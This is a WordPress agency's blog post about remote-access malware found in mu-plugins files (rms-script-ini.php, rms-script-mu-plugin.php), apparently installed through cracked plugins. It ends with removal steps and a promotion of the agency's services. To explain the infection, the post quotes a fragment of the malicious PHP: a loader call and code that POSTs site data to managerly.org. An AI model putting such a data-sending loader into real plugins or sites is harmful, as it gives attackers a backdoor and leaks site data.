WordPress websites are finding some remote access malware that was giving remote access to an external site. The location of this malware was later found to be some random PHP files in the wp-content/mu-plugins folder.
One of the things we do here at Drawlines is to make sure that our client’s security is maintained. Some of our clients pay us to do a monthly security one time look over but others pay us to watch their website per week. We found this malware in our client’s website even with weekly scans. This shows you that just scanning the websites or scanning only 1 time per month isn’t enough nowadays. Especially since more businesses are looking to make business over the web cause of the pandemic. This blog post is to help businesses that cant afford our services but wants to try and maintain their website nonetheless.
What does it do
At first, it looks like your WordPress site is showing a strange error. This error is being caused by the remote access malware and can be traced to the wp-content/mu-plugins folder, specifically the suspicious PHP files rms-script-ini.php and rms-script-mu-plugin.php, take a look at picture below. These files pop up in multiple locations in your plugin / theme directory:
We scanned it with an anti-malware scan. We use it to run on our client’s websites as part of their monthly hosting / domain subscription package. Even after malware scans were performed on the site, there wasn’t any sign of the remote access malware. But it seems that the code was giving remote login access to an external site, www.managerly.org. Here is a part of the code found in a cracked plugin that requires the two malicious PHP scripts:
"require_once('rms-script-ini.php'); rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);"
Here is the code snippet following up the previous one:
$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php'; $args= [ 'method' => 'POST', 'timeout' => 15, 'redirection' => 15, 'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']], 'body' => $body ]; // Send to RMS $curl = new Wp_Http_Curl(); $result=$curl->request($connect_to, $args); $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;
Sample of what I found in one of the plugins:
This code seems to collect data from the website it’s on and send it to the external site – in essence, it is a remote access malware that sends your data to the site managerly.org. This can be extremely harmful – more on that in the next section.
Further analysis on managerly.org reveals the following information:
- Registrant Organization: Wuxi Yilian LLC
- Registrant State/Province: Fujian
- Registrant Country: CN
- Name Server: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
- DNSSEC: unsigned
Searching the registrant organization’s name returns a lot of hits on Reddit posts too. It seems like this LLC is fake and is into other scams as well. Here are a few search results:
Why This Malware is Dangerous
In a remote access malware attack, the attackers can gain access to your website and use it for their malicious campaigns. You could lose control of your site and sensitive data could be revealed to the attacker. Here, the attackers are trying to mine WordPress accounts through the rms-script remote access malware! This hack can probably bypass your website’s security even if you change your password. This issue has a high chance of recurring, as free security tools are not able to detect this malware. Drawlines web services can help you maintain your web security with our hosting services. One of the services that you pay for per month in our subscription plan is security.
Make sure to also check for any malicious PHP files in the wp-contents/mu-plugins folder and the Divi Theme folder if you have it installed.
How to Fix it
1. Backup your site:
Backup your website before doing anything first. Just in case you delete something that is actually a part of your website you have a backup to replace the file and try again. Even if the malware code is on that file. Make sure to take the backup in a compressed file format, like .zip. You also want to temporarily shut your site down. You don’t want your customers / clients putting their personal info on a hacked site.
2. Remove any nulled or cracked plugins:
We are all trying to save a couple of bucks but if you have never coded before or you don’t even know what you are looking at on this blog post you shouldn’t be downloading nulled or cracked plugins. You are putting a lot of people in high risk, and for what? You’ll just get hacked along with the rest of them. It’s safer to purchase these plugins or hire a web designer that can properly install them and make sure your site is secure. Delete the plugins you downloaded and installed to get rid of the primary plugins or themes that are cause this issue.
3. Delete all suspicious folders and files:
Check for files that could potentially be malicious on your site, and delete them. Your biggest clue will always be the dates the files have been edited or updated. If you find recently edited files those dates might be your clue to finding all the files that are hacked.
4. Run a malware scan:
Malware is continuously evolving, but so are malware scanners. It’s always a good idea to run a malware scan on your web server for malware and malicious files. You can use the ‘Virus Scanner’ tool in the cPanel provided by your web host. Or any WordPress security plugin you have. Wordfence is a plugin we use on top of others.
If you can not follow any of these steps I’d recommend you contact us at info@drawlines.net or you can contact us at (908) 543-4785 and let us help you. We can do a one-time website cleaning, we can talk about the hosting / domain subscription plans. Either way, we can help.
